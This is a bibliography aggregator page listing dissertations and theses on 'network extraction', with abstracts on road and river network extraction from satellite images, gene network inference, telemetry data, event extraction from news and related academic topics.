Dissertations / Theses on the topic 'Network extraction'

To see the other types of publications on this topic, follow the link: Network extraction.

Create a spot-on reference in APA, MLA, Chicago, Harvard, and other styles

Select a source type:

Consult the top 50 dissertations / theses for your research on the topic 'Network extraction.'

Next to every source in the list of references, there is an 'Add to bibliography' button. Press on it, and we will generate automatically the bibliographic reference to the chosen work in the citation style you need: APA, MLA, Harvard, Chicago, Vancouver, etc.

You can also download the full text of the academic publication as pdf and read online its abstract whenever available in the metadata.

Browse dissertations / theses on a wide variety of disciplines and organise your bibliography correctly.

1

McEnnis, Daniel. "On-demand metadata extraction network (OMEN)." Thesis, McGill University, 2006. http://digitool.Library.McGill.CA:80/R/?func=dbin-jump-full&object_id=99382.

Full text
Abstract:
OMEN (On-demand Metadata Extraction Network) addresses a fundamental problem in Music Information Retrieval: the lack of universal access to a large dataset containing significant amounts of copyrighted music. This thesis proposes a solution to this problem that is accomplished by utilizing the large collections of digitized music available at many libraries. Using OMEN, libraries will be able to perform on-demand feature extraction on site, returning feature values to researchers instead of providing direct access to the recordings themselves. This avoids copyright difficulties, since the underlying music never leaves the library that owns it. The analysis is performed using grid-style computation on library machines that are otherwise under-used (e.g., devoted to patron web and catalogue use).
APA, Harvard, Vancouver, ISO, and other styles
2

El, Ghoul Aymen. "Phase fields for network extraction from images." Nice, 2010. http://www.theses.fr/2010NICE4075.

Full text
Abstract:
Cette thèse décrit la construction d’un modèle de réseaux non-directionnels (e. G. Réseaux routiers), fondé sur les contours actifs d’ordre supérieur (CAOs) et les champs de phase développés récemment, et introduit une nouvelle famille de champs de phase des CAOs pour les réseaux directionnels (e. G. Réseaux hydrographiques, vaisseaux sanguins). Dans la première partie de cette thèse, nous nous intéressons à l’analyse de la stabilité d’une énergie de type CAOs aboutissant à un « diagramme de phase ». Les résultats permettent une sélection des valeurs des paramètres pour la modélisation de réseaux non-directionnels. Au contraire des réseaux routiers, les réseaux hydrographiques sont directionnels, i. E. Ils contiennent un « flux » monodimensionnel circulant dans chaque branche. Nous développons un modèle de champ de phase non-local de réseaux directionnels, qui, en plus du champ de phase scalaire décrivant une région par une fonction caractéristique lisse et qui interagit non-localement afin que des configurations de réseaux linéiques soient favorisées, introduit un champ vectoriel représentant le « flux » dans les branches du réseau. Ce champ vectoriel est contraint d’être nul à l’extérieur, et de magnitude égale à 1 à l’intérieur du réseau ; circulant dans le sens longitudinal des branches du réseau ; et de divergence très faible. Cela prolonge les branches du réseau ; contrôle la variation de largeur tout au long d’une branche, et forme des jonctions non-symétriques telles que la somme des largeurs entrantes soit approximativement égale à celle des largeurs sortantes. Ce nouveau modèle a été appliqué au problème d’extraction de réseaux hydrographiques à partir d’images satellitaires très haute résolution
This thesis describes the construction of an undirected network (e. G. Road network) model, based on the recently developed higher-order active contours (HOACs) and phase fields, and introduces a new family of phase field HOACs for directed networks (e. G. Hydrographic networks in remote sensing imagery, vascular networks in medical imagery). In the first part of this thesis, we focus on the stability analysis of a HOAC energy leading to a “phase diagram”. The results which are confirmed by numerical experiments enable the selection of parameter values for the modeling of indirectly networks. Hydrographic networks, unlike road networks, are directed, i. E. They carry a unidirectional flow in each branch. This leads to specific geometric properties of the branches and particularly of the junctions that it is useful to capture in model, for network extraction purposes. We thus develop a nonlocal phase field model of directed networks, which, in addition to a scalar field representing a region by its smoothed characteristic function and interacting no locally so as to favor network configurations, contains a vector field representing the “flow” through the network branches. The vector field is strongly encouraged to be zero outside, and of unit magnitude inside the network ; running along the network branches ; and to have a zero divergence. This prolongs network, controls width variation along a branch ; and produces asymmetric junctions for which total incoming branch width approximately equals total outgoing branch width. The new proposed model is applied to the problem of hydrographic network extraction from very high resolution satellite images, and it outperforms the undirected network model
APA, Harvard, Vancouver, ISO, and other styles
3

Swanepoel, Lodewyk. "Network simulation for the effective extraction of IP network statistics / Lodewyk Swanepoel." Thesis, North-West University, 2003. http://hdl.handle.net/10394/231.

Full text
Abstract:
This study investigates the extent to which a communication sessions' QoS parameters can be measured through only extracting TCP/IP header data. The effect on these measurements based on the point of header extraction within the network as well as the OSI stack are also investigated. An overview of packet switched networks and packet switched network protocols are given. The disadvantages and advantages of different network architectures and protocols are also given. Different network simulation tools are discussed and compared to find the most appropriate simulation tool for this study. Two network topologies are introduced and sessions are constructed and monitored through only using the TCP/IP header data. Sessions are established and maintained and the results obtained from these sessions are compared and the most appropriate solution is chosen. The results have shown that extracting data at the edge routers for sessions are the most optimal solution. These sessions are established and maintained through using virtual private network technologies and protocols.
Thesis (M.Ing.)--North-West University, Potchefstroom Campus, 2004.
APA, Harvard, Vancouver, ISO, and other styles
4

Kushmerick, Nicholas. "Wrapper induction for information extraction /." Thesis, Connect to this title online; UW restricted, 1997. http://hdl.handle.net/1773/6867.

Full text
APA, Harvard, Vancouver, ISO, and other styles
5

Tong, Dong Ling. "Genetic algorithm-neural network : feature extraction for bioinformatics data." Thesis, Bournemouth University, 2010. http://eprints.bournemouth.ac.uk/15788/.

Full text
Abstract:
With the advance of gene expression data in the bioinformatics field, the questions which frequently arise, for both computer and medical scientists, are which genes are significantly involved in discriminating cancer classes and which genes are significant with respect to a specific cancer pathology. Numerous computational analysis models have been developed to identify informative genes from the microarray data, however, the integrity of the reported genes is still uncertain. This is mainly due to the misconception of the objectives of microarray study. Furthermore, the application of various preprocessing techniques in the microarray data has jeopardised the quality of the microarray data. As a result, the integrity of the findings has been compromised by the improper use of techniques and the ill-conceived objectives of the study. This research proposes an innovative hybridised model based on genetic algorithms (GAs) and artificial neural networks (ANNs), to extract the highly differentially expressed genes for a specific cancer pathology. The proposed method can efficiently extract the informative genes from the original data set and this has reduced the gene variability errors incurred by the preprocessing techniques. The novelty of the research comes from two perspectives. Firstly, the research emphasises on extracting informative features from a high dimensional and highly complex data set, rather than to improve classification results. Secondly, the use of ANN to compute the fitness function of GA which is rare in the context of feature extraction. Two benchmark microarray data have been taken to research the prominent genes expressed in the tumour development and the results show that the genes respond to different stages of tumourigenesis (i.e. different fitness precision levels) which may be useful for early malignancy detection. The extraction ability of the proposed model is validated based on the expected results in the synthetic data sets. In addition, two bioassay data have been used to examine the efficiency of the proposed model to extract significant features from the large, imbalanced and multiple data representation bioassay data.
APA, Harvard, Vancouver, ISO, and other styles
6

Seegmiller, Ray D., Greg C. Willden, Maria S. Araujo, Todd A. Newton, Ben A. Abbott, and William A. Malatesta. "Automation of Generalized Measurement Extraction from Telemetric Network Systems." International Foundation for Telemetering, 2012. http://hdl.handle.net/10150/581647.

Full text
Abstract:
ITC/USA 2012 Conference Proceedings / The Forty-Eighth Annual International Telemetering Conference and Technical Exhibition / October 22-25, 2012 / Town and Country Resort & Convention Center, San Diego, California
In telemetric network systems, data extraction is often an after-thought. The data description frequently changes throughout the program so that last minute modifications of the data extraction approach are often required. This paper presents an alternative approach in which automation of measurement extraction is supported. The central key is a formal declarative language that can be used to configure instrumentation devices as well as measurement extraction devices. The Metadata Description Language (MDL) defined by the integrated Network Enhanced Telemetry (iNET) program, augmented with a generalized measurement extraction approach, addresses this issue. This paper describes the TmNS Data Extractor Tool, as well as lessons learned from commercial systems, the iNET program and TMATS.
APA, Harvard, Vancouver, ISO, and other styles
7

Karaman, Ersin. "Road Network Extraction From High-resolution Multi-spectral Satellite Images." Phd thesis, METU, 2012. http://etd.lib.metu.edu.tr/upload/12615362/index.pdf.

Full text
Abstract:
In this thesis, an automatic road extraction algorithm for multi-spectral images is developed. The developed model extracts elongated structures from images by using edge detection, segmentation and clustering techniques. The study also extracts non-road regions like vegetative fields, bare soils and water bodies to obtain more accurate road map. The model is constructed in a modular approach that aims to extract roads with different characteristics. Each module output is combined to create a road score map. The developed algorithm is tested on 8-band WorldView-2 satellite images. It is observed that, the proposed road extraction algorithm yields 47 % precision and 70 % recall. The approach is also tested on the lower spectral resolution images with four-band, RGB and gray level. It is observed that the additional four bands provide an improvement of 12 % for precision and 3 % for recall. Road type analysis is also in the scope of this study. Roads are classified into asphalt, concrete and unpaved using Gaussian Mixture Models. Other linear objects such as railroads and water canals may also be extracted by this process. An algorithm that classifies drive roads and railroads for very high resolution images is also investigated. It is based on the Fourier descriptors that identify the presence of railroad sleepers. Water canals are also extracted in multi-spectral images by using spectral ratios that employ the near infrared bands. Structural properties are used to distinguish water canals from other water bodies in the image.
APA, Harvard, Vancouver, ISO, and other styles
8

Kumuthini, Judit. "Extraction of genetic network from microarray data using Bayesian framework." Thesis, Cranfield University, 2007. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.442547.

Full text
APA, Harvard, Vancouver, ISO, and other styles
9

Wang, Wei. "Event Detection and Extraction from News Articles." Diss., Virginia Tech, 2018. http://hdl.handle.net/10919/82238.

Full text
Abstract:
Event extraction is a type of information extraction(IE) that works on extracting the specific knowledge of certain incidents from texts. Nowadays the amount of available information (such as news, blogs, and social media) grows in exponential order. Therefore, it becomes imperative to develop algorithms that automatically extract the machine-readable information from large volumes of text data. In this dissertation, we focus on three problems in obtaining event-related information from news articles. (1) The first effort is to comprehensively analyze the performance and challenges in current large-scale event encoding systems. (2) The second problem involves event detection and critical information extractions from news articles. (3) Third, the efforts concentrate on event-encoding which aims to extract event extent and arguments from texts. We start by investigating the two large-scale event extraction systems (ICEWS and GDELT) in the political science domain. We design a set of experiments to evaluate the quality of the extracted events from the two target systems, in terms of reliability and correctness. The results show that there exist significant discrepancies between the outputs of automated systems and hand-coded system and the accuracy of both systems are far away from satisfying. These findings provide preliminary background and set the foundation for using advanced machine learning algorithms for event related information extraction. Inspired by the successful application of deep learning in Natural Language Processing (NLP), we propose a Multi-Instance Convolutional Neural Network (MI-CNN) model for event detection and critical sentences extraction without sentence level labels. To evaluate the model, we run a set of experiments on a real-world protest event dataset. The result shows that our model could be able to outperform the strong baseline models and extract the meaningful key sentences without domain knowledge and manually designed features. We also extend the MI-CNN model and propose an MIMTRNN model for event extraction with distant supervision to overcome the problem of lacking fine level labels and small size training data. The proposed MIMTRNN model systematically integrates the RNN, Multi-Instance Learning, and Multi-Task Learning into a unified framework. The RNN module aims to encode into the representation of entity mentions the sequential information as well as the dependencies between event arguments, which are very useful in the event extraction task. The Multi-Instance Learning paradigm makes the system does not require the precise labels in entity mention level and make it perfect to work together with distant supervision for event extraction. And the Multi-Task Learning module in our approach is designed to alleviate the potential overfitting problem caused by the relatively small size of training data. The results of the experiments on two real-world datasets(Cyber-Attack and Civil Unrest) show that our model could be able to benefit from the advantage of each component and outperform other baseline methods significantly.
Ph. D.
APA, Harvard, Vancouver, ISO, and other styles
10

Bródka, Piotr. "Key User Extraction Based on Telecommunication Data." Thesis, Blekinge Tekniska Högskola, Sektionen för datavetenskap och kommunikation, 2012. http://urn.kb.se/resolve?urn=urn:nbn:se:bth-5863.

Full text
Abstract:
The number of systems that collect vast amount of data about users rapidly grow during last few years. Many of these systems contain data not only about people characteristics but also about their relationships with other system users. From this kind of data it is possible to extract a social network that reflects the connections between system’s users. Moreover, the analysis of such social network enables to investigate different characteristics of its users and their linkages. One of the types of examining such network is key users extraction. Key users are these who have the biggest impact on other network users as well as have big influence on network evolution. The obtained knowledge about these users enables to investigate and predict changes within the network. So this knowledge is very important for the people or companies who make a profit from the network like telecommunication company. The second important issue is the ability to extract these users as quick as possible, i.e. developed the algorithm that will be time-effective in large social networks where number of nodes and edges is equal few millions.
APA, Harvard, Vancouver, ISO, and other styles
11

Lord, Dale, and Kurt Kosbar. "An Architecture for Sensor Data Fusion to Reduce Data Transmission Bandwidth." International Foundation for Telemetering, 2004. http://hdl.handle.net/10150/605790.

Full text
Abstract:
International Telemetering Conference Proceedings / October 18-21, 2004 / Town & Country Resort, San Diego, California
Sensor networks can demand large amounts of bandwidth if the raw sensor data is transferred to a central location. Feature recognition and sensor fusion algorithms can reduce this bandwidth. Unfortunately the designers of the system, having not yet seen the data which will be collected, may not know which algorithms should be used at the time the system is first installed. This paper describes a flexible architecture which allows the deployment of data reduction algorithms throughout the network while the system is in service. The network of sensors approach not only allows for signal processing to be pushed closer to the sensor, but helps accommodate extensions to the system in a very efficient and structured manner.
APA, Harvard, Vancouver, ISO, and other styles
12

Howes, Peter John. "Analysis of neural network mapping functions : generating evidential support." Thesis, Oxford Brookes University, 1999. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.287718.

Full text
APA, Harvard, Vancouver, ISO, and other styles
13

Wang, Chen. "From network to pathway: integrative network analysis of genomic data." Diss., Virginia Tech, 2011. http://hdl.handle.net/10919/77121.

Full text
Abstract:
The advent of various types of high-throughput genomic data has enabled researchers to investigate complex biological systems in a systemic way and started to shed light on the underlying molecular mechanisms in cancers. To analyze huge amounts of genomic data, effective statistical and machine learning tools are clearly needed; more importantly, integrative approaches are especially needed to combine different types of genomic data for a network or pathway view of biological systems. Motivated by such needs, we make efforts in this dissertation to develop integrative framework for pathway analysis. Specifically, we dissect the molecular pathway into two parts: protein-DNA interaction network and protein-protein interaction network. Several novel approaches are proposed to integrate gene expression data with various forms of biological knowledge, such as protein-DNA interaction and protein-protein interaction for reliable molecular network identification. The first part of this dissertation seeks to infer condition-specific transcriptional regulatory network by integrating gene expression data and protein-DNA binding information. Protein-DNA binding information provides initial relationships between transcription factors (TFs) and their target genes, and this information is essential to derive biologically meaningful integrative algorithms. Based on the availability of this information, we discuss the inference task based on two different situations: (a) if protein-DNA binding information of multiple TFs is available: based on the protein-DNA data of multiple TFs, which are derived from sequence analysis between DNA motifs and gene promoter regions, we can construct initial connection matrix and solve the network inference using a constraint least-squares approach named motif-guided network component analysis (mNCA). However, connection matrix usually contains a considerable amount of false positives and false negatives that make inference results questionable. To circumvent this problem, we propose a knowledge based stability analysis (kSA) approach to test the conditional relevance of individual TFs, by checking the discrepancy of multiple estimations of transcription factor activity with respect to different perturbations on the connections. The rationale behind stability analysis is that the consistency of observed gene expression and true network connection shall remain stable after small perturbations are applied to initial connection matrix. With condition-specific TFs prioritized by kSA, we further propose to use multivariate regression to highlight condition-specific target genes. Through simulation studies comparing with several competing methods, we show that the proposed schemes are more sensitive to detect relevant TFs and target genes for network inference purpose. Experimentally, we have applied stability analysis to yeast cell cycle experiment and further to a series of anti-estrogen breast cancer studies. In both experiments not only biologically relevant regulators are highlighted, the condition-specific transcriptional regulatory networks are also constructed, which could provide further insights into the corresponding cellular mechanisms. (b) if only single TF's protein-DNA information is available: this happens when protein-DNA binding relationship of individual TF is measured through experiments. Since original mNCA requires a complete connection matrix to perform estimation, an incomplete knowledge of single TF is not applicable for such approach. Moreover, binding information derived from experiments could still be inconsistent with gene expression levels. To overcome these limitations, we propose a linear extraction scheme called regulatory component analysis (RCA), which can infer underlying regulation relationships, even with partial biological knowledge. Numerical simulations show significant improvement of RCA over other traditional methods to identify target genes, not only in low signal-to-noise-ratio situations and but also when the given biological knowledge is incomplete and inconsistent to data. Furthermore, biological experiments on Escherichia coli regulatory network inferences are performed to fairly compare traditional methods, where the effectiveness and superior performance of RCA are confirmed. The second part of the dissertation moves from protein-DNA interaction network up to protein-protein interaction network, to identify dys-regulated protein sub-networks by integrating gene expression data and protein-protein interaction information. Specifically, we propose a statistically principled method, namely Metropolis random walk on graph (MRWOG), to highlight condition-specific PPI sub-networks in a probabilistic way. The method is based on the Markov chain Monte Carlo (MCMC) theory to generate a series of samples that will eventually converge to some desired equilibrium distribution, and each sample indicates the selection of one particular sub-network during the process of Metropolis random walk. The central idea of MRWOG is built upon that the essentiality of one gene to be included in a sub-network depends on not only its expression but also its topological importance. Contrasted to most existing methods constructing sub-networks in a deterministic way and therefore lacking relevance score for each protein, MRWOG is capable of assessing the importance of each individual protein node in a global way, not only reflecting its individual association with clinical outcome but also indicating its topological role (hub, bridge) to connect other important proteins. Moreover, each protein node is associated with a sampling frequency score, which enables the statistical justification of each individual node and flexible scaling of sub-network results. Based on MRWOG approach, we further propose two strategies: one is bootstrapping used for assessing statistical confidence of detected sub-networks; the other is graphic division to separate a large sub-network to several smaller sub-networks for facilitating interpretations. MRWOG is easy to use with only two parameters need to be adjusted, one is beta value for performing random walk and another is Quantile level for calculating truncated posteriori mean. Through extensive simulations, we show that the proposed scheme is not sensitive to these two parameters in a relatively wide range. We also compare MRWOG with deterministic approaches for identifying sub-network and prioritizing topologically important proteins, in both cases MRWG outperforms existing methods in terms of both precision and recall. By utilizing MRWOG generated node/edge sampling frequency, which is actually posteriori mean of corresponding protein node/interaction edge, we illustrate that condition-specific nodes/interactions can be better prioritized than the schemes based on scores of individual node/interaction. Experimentally, we have applied MRWOG to study yeast knockout experiment for galactose utilization pathways to reveal important components of corresponding biological functions; we also applied MRWSOG to study breast cancer patient prognostics problems, where the sub-network analysis could lead to an understanding of the molecular mechanisms of antiestrogen resistance in breast cancer. Finally, we conclude this dissertation with a summary of the original contributions, and the future work for deepening the theoretical justification of the proposed methods and broadening their potential biological applications such as cancer studies.
Ph. D.
APA, Harvard, Vancouver, ISO, and other styles
14

Linåker, Fredrik. "Prototype Extraction and Learning Using Prototypes in an Artificial Neural Network." Thesis, University of Skövde, Department of Computer Science, 1997. http://urn.kb.se/resolve?urn=urn:nbn:se:his:diva-294.

Full text
Abstract:

A prototype is a general description which depicts what an entire set of exemplars, belonging to a certain category, looks like. We investigate how prototypes, in the form of mathematical averages of a category's exemplar vectors, can be represented, extracted, accessed, and used for learning in an Artificial Neural Network (ANN). From the method by which an ANN classifies exemplars into categories, we conclude that prototype access (the production of an extracted prototype) can be performed using a very simple architecture. We go on to show how the architecture can be used for prototype extraction by simply exploiting how the back-propagation learning rule handles one-to-many mappings. We note that no extensions to the classification training sets are needed as long as they conform to certain restrictions. We then go on to show how the extracted prototypes can be used for the learning of new categories which are compositions of existing categories and we show how this can lead to reduced training sets and ultimately reduced learning times. A number of restrictions are noted which have to be considered in order for this to work. For example, the exemplar representations must be systematic and the categories linearly separable. The results, and other properties of our network, are compared with other architectures which also use some kind of prototype concept. Our conclusion is that prototype extraction and learning using prototypes is possible using a simple ANN architecture. Finally, we relate our system to the symbol grounding problem and point out some directions for future work.

APA, Harvard, Vancouver, ISO, and other styles
15

Kara, Kerim. "A 3-d Vascular Connectivity Tracking And Vascular Network Extraction Toolkit." Master's thesis, METU, 2011. http://etd.lib.metu.edu.tr/upload/12613201/index.pdf.

Full text
Abstract:
Angiography is an invasive procedure since contrast medium is injected into circulatory system of patients and the mostly preferred technique is X-ray angiography. For diagnosis, treatment planning, and risk assessment purposes, interventional radiologists utilize visual inspection to determine connectivity relations between vessels. This situation leads angiography to be more invasive, since it requires additional injection of contrast medium and X-ray dose. This thesis work presents a 3-D vascular connectivity tracking toolkit for automated extraction of vascular networks in 3-D medical images. The proposed method automatically extracts the vascular network connected to a user-defined point in a user-defined direction, and requires no further user interaction. The toolkit prevents additional injection of contrast agent and X-ray dose, saves time for the interventional radiologist. While the algorithm is applicable on all 3-D angiography images, performance of the method is observed on 3-D catheter angiography image of cerebrovascular structures. The algorithm iteratively tracks gravity centers of vascular branches in the user-defined direction, preserving connection to the user-defined point. Curvy branches are tracked even if they have discontinuous portions. Since this tracking method does not depend on lumen diameter and intensity differences, branches with stenoses and branches having large intensity difference can be successfully tracked. Skeletonization and junction detection methods are described, which are used to detect the sub branches, indirectly connected to the point. These methods are capable of handling bifurcations, trifurcations, and junctions having more branches. However, false junctions occurring due to superposition of vessels are not eliminated.
APA, Harvard, Vancouver, ISO, and other styles
16

Kyriakopoulos, Konstantinos G. "Wavelet analysis for compression and feature extraction of network performance measurements." Thesis, Loughborough University, 2008. https://dspace.lboro.ac.uk/2134/3558.

Full text
Abstract:
Monitored network data allows network managers and operators to gain valuable insight into the health and status of a network. Whilst such data is useful for real-time analysis, there is often a need to post-process historical network performance data. Storage of the monitored data then becomes a serious issue as network monitoring activities generate significant quantities of data. This thesis is part of the EPSRC sponsored MASTS (Measurements in All Scales in Time and Space) project. MASTS is a joint project between Loughborough, Cambridge and UCL and focuses on measuring, analyzing, compressing and storing network characteristics of JANET (UK's research/academic network). The work in this thesis is motivated by the need of measuring the performance of high-speed networks and particularly of UKLight. UKLight connects JANET to U.S.A and the rest of Europe. Such networks produce large amounts of data over a long period of time, making the storage of this information practically inefficient. A possible solution to this problem is to use lossy compression on an on-line system that intelligently compresses computer network measurements while preserving the quality in important characteristics of the signal and various statistical properties. This thesis contributes to the knowledge by examining two threshold estimation techniques, two threshold application techniques, the impact of window size on the lossy compression performance. In addition eight different wavelets were examined in terms of compression performance, energy preservation, scaling be- haviour, quality attributes (mean, standard deviation, visual quality and PSNR) and Long Range Dependence. Finally, this thesis contributes by presenting a technique for precise quality control of the reconstructed signal and an additional use of wavelets for detecting sudden changes. The results of the thesis show that the proposed Gupta-Kaur (GK) based algorithm compresses on average delay signals 17 times and data rate signals 11.2 times while accurately preserving their statistical properties.
APA, Harvard, Vancouver, ISO, and other styles
17

Plahl, Christian [Verfasser]. "Neural network based feature extraction for speech and image recognition / Christian Plahl." Aachen : Hochschulbibliothek der Rheinisch-Westfälischen Technischen Hochschule Aachen, 2014. http://d-nb.info/1058851160/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
18

Grote, Anne [Verfasser]. "Automatic road network extraction in suburban areas from aerial images / Anne Grote." Hannover : Technische Informationsbibliothek und Universitätsbibliothek Hannover (TIB), 2011. http://d-nb.info/1015469515/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
19

Ozturk, Mahir. "Markov Random Field Based Road Network Extraction From High Resoulution Satellite Images." Master's thesis, METU, 2013. http://etd.lib.metu.edu.tr/upload/12615499/index.pdf.

Full text
Abstract:
Road Networks play an important role in various applications such as urban and rural planning, infrastructure planning, transportation management, vehicle navigation. Extraction of Roads from Remote Sensed satellite images for updating road database in geographical information systems (GIS) is generally done manually by a human operator. However, manual extraction of roads is time consuming and labor intensive process. In the existing literature, there are a great number of researches published for the purpose of automating the road extraction process. However, automated processes still yield some erroneous and incomplete results and human intervention is still required. The aim of this research is to propose a framework for road network extraction from high spatial resolution multi-spectral imagery (MSI) to improve the accuracy of road extraction systems. The proposed framework begins with a spectral classification using One-class Support Vector Machines (SVM) and Gaussian Mixture Models (GMM) classifiers. Spectral Classification exploits the spectral signature of road surfaces to classify road pixels. Then, an iterative template matching filter is proposed to refine spectral classification results. K-medians clustering algorithm is employed to detect candidate road centerline points. Final road network formation is achieved by Markov Random Fields. The extracted road network is evaluated against a reference dataset using a set of quality metrics.
APA, Harvard, Vancouver, ISO, and other styles
20

Karmanska, Anna. "Environmental Assessment of Ukraine Emerald Network Objects in the Uranium Extraction Area." Thesis, National Aviation University, 2020. https://er.nau.edu.ua/handle/NAU/49667.

Full text
Abstract:
Робота публікується згідно наказу ректора від 21.01.2020 р. №008/од "Про перевірку кваліфікаційних робіт на академічний плагіат у 2019-2020 навчальному році". Керівник проекту: доцент, к. г.-м.н. Дудар Тамара Вікторівна
Object of research: environment assessment of Natural Preserve Fund objects within the uranium mining area. Subject of research: the Natural Preserve Fund objects in the vicinity of uranium mining area. Aim оf research: Natural substances within the internal antigenic load, as well as exposed elements of the Emerald Network. Methods of research: The references to the creation of Emerald Network projects in the gloomy countries of Ukraine are very relevant today, using analytical and scientific work within the framework of a strong supervisory body, and its work on natural resources.Аnalysis of the creation of the Emerald Company facilities will help to evaluate the stations that require the Council of Europe to approximate the legislation of Ukraine, which seek to investigate the Berne Convention and its necessary recommendations and recommendations.
APA, Harvard, Vancouver, ISO, and other styles
21

Karmanska, Anna. "Environmental Assessment of Ukraine Emerald Network Objects in the Uranium Extraction Area." Thesis, National Aviation University, 2020. http://er.nau.edu.ua/handle/NAU/41531.

Full text
Abstract:
Робота публікується згідно наказу ректора від 21.01.2020 р. №008/од "Про перевірку кваліфікаційних робіт на академічний плагіат у 2019-2020 навчальному році". Керівник проекту: доцент, к. г.-м.н. Дудар Тамара Вікторівна
Object of research: environment assessment of Natural Preserve Fund objects within the uranium mining area. Subject of research: the Natural Preserve Fund objects in the vicinity of uranium mining area. Aim оf research: Natural substances within the internal antigenic load, as well as exposed elements of the Emerald Network. Methods of research: The references to the creation of Emerald Network projects in the gloomy countries of Ukraine are very relevant today, using analytical and scientific work within the framework of a strong supervisory body, and its work on natural resources.Аnalysis of the creation of the Emerald Company facilities will help to evaluate the stations that require the Council of Europe to approximate the legislation of Ukraine, which seek to investigate the Berne Convention and its necessary recommendations and recommendations.
APA, Harvard, Vancouver, ISO, and other styles
22

Ghanem, Amer G. "Identifying Patterns of Epistemic Organization through Network-Based Analysis of Text Corpora." University of Cincinnati / OhioLINK, 2015. http://rave.ohiolink.edu/etdc/view?acc_num=ucin1448274706.

Full text
APA, Harvard, Vancouver, ISO, and other styles
23

Glinos, Demetrios. "SYNTAX-BASED CONCEPT EXTRACTION FOR QUESTION ANSWERING." Doctoral diss., University of Central Florida, 2006. http://digital.library.ucf.edu/cdm/ref/collection/ETD/id/3565.

Full text
Abstract:
Question answering (QA) stands squarely along the path from document retrieval to text understanding. As an area of research interest, it serves as a proving ground where strategies for document processing, knowledge representation, question analysis, and answer extraction may be evaluated in real world information extraction contexts. The task is to go beyond the representation of text documents as "bags of words" or data blobs that can be scanned for keyword combinations and word collocations in the manner of internet search engines. Instead, the goal is to recognize and extract the semantic content of the text, and to organize it in a manner that supports reasoning about the concepts represented. The issue presented is how to obtain and query such a structure without either a predefined set of concepts or a predefined set of relationships among concepts. This research investigates a means for acquiring from text documents both the underlying concepts and their interrelationships. Specifically, a syntax-based formalism for representing atomic propositions that are extracted from text documents is presented, together with a method for constructing a network of concept nodes for indexing such logical forms based on the discourse entities they contain. It is shown that meaningful questions can be decomposed into Boolean combinations of question patterns using the same formalism, with free variables representing the desired answers. It is further shown that this formalism can be used for robust question answering using the concept network and WordNet synonym, hypernym, hyponym, and antonym relationships. This formalism was implemented in the Semantic Extractor (SEMEX) research tool and was tested against the factoid questions from the 2005 Text Retrieval Conference (TREC), which operated upon the AQUAINT corpus of newswire documents. After adjusting for the limitations of the tool and the document set, correct answers were found for approximately fifty percent of the questions analyzed, which compares favorably with other question answering systems.
Ph.D.
School of Computer Science
Engineering and Computer Science
Computer Science
APA, Harvard, Vancouver, ISO, and other styles
24

Li, Hui [Verfasser], and Michael [Akademischer Betreuer] Gertz. "Social Network Extraction and Exploration of Historic Correspondences / Hui Li ; Betreuer: Michael Gertz." Heidelberg : Universitätsbibliothek Heidelberg, 2018. http://d-nb.info/117738454X/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
25

Serra, Torrens Jordi. "Completion time minimization for distributed feature extraction in a visual sensor network testbed." Thesis, KTH, Kommunikationsnät, 2014. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-156883.

Full text
Abstract:
Real-time detection and extraction of visual features in wireless sensor networks is a challenging task due to its computational complexity and the limited processing power of the nodes. A promising approach is to distribute the workload to other nodes of the network by delegating the processing of different regions of the image to different nodes. In this work a solution to optimally schedule the loads assigned to each node is implemented on a real visual sensor network testbed. To minimize the time required to process an image, the size of the subareas assigned to the cooperators are calculated by solving a linear programming problem taking into account the transmission and processing speed of the nodes and the spatial distribution of the visual features. In order to minimize the global workload, an optimal detection threshold is predicted such that only the most significant features are extracted. The solution is implemented on a visual sensor network testbed consisting of BeagleBone Black computers capable of communicating over IEEE 802.11. The capabilities of the testbed are also extended by adapting a reliable transmission protocol based on UDP capable of multicast transmission. The performance of the implemented algorithms is evaluated on the testbed.
APA, Harvard, Vancouver, ISO, and other styles
26

Sanchez, Monica A. "Doppler Extraction for a Demand Assignment Multiple Access Service for NASA's Space Network." International Foundation for Telemetering, 1996. http://hdl.handle.net/10150/611433.

Full text
Abstract:
International Telemetering Conference Proceedings / October 28-31, 1996 / Town and Country Hotel and Convention Center, San Diego, California
NASA's Space Network (SN) provides both single access (SA) and multiple access (MA) services through a pre-scheduling system. Currently, a user's spacecraft is incapable of receiving service unless prior scheduling occurred with the control center. NASA is interested in efficiently utilizing the time between scheduled services. Thus, a demand assignment multiple access (DAMA) service study was conducted to provide a solution. The DAMA service would allow the user's spacecraft to initiate a service request. The control center could then schedule the next available time slot upon owner approval. In this paper, the basic DAMA service request design and integration is presented.
APA, Harvard, Vancouver, ISO, and other styles
27

Halling, Leonard. "Feature Extraction for ContentBased Image Retrieval Using a PreTrained Deep Convolutional Neural Network." Thesis, KTH, Skolan för elektroteknik och datavetenskap (EECS), 2020. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-274340.

Full text
Abstract:
This thesis examines the performance of features, extracted from a pre-trained deep convolutional neural network, for content-based image retrieval in images of news articles. The industry constantly awaits improved methods for image retrieval, including the company hosting this research project, who are looking to improve their existing image description-based method for image retrieval. It has been shown that in a neural network, the invoked activations from an image can be used as a high-level representation (feature) of the image. This study explores the efficiency of these features in an image similarity setting. An experiment is performed, evaluating the performance through a comparison of the answers in an image similarity survey, containing solutions made by humans. The new model scores 72.5% on the survey, and outperforms the existing image description-based method which only achieved a score of 37.5%. Discussions about the results, design choices, and suggestions for further improvements of the implementation are presented in the later parts of the thesis.
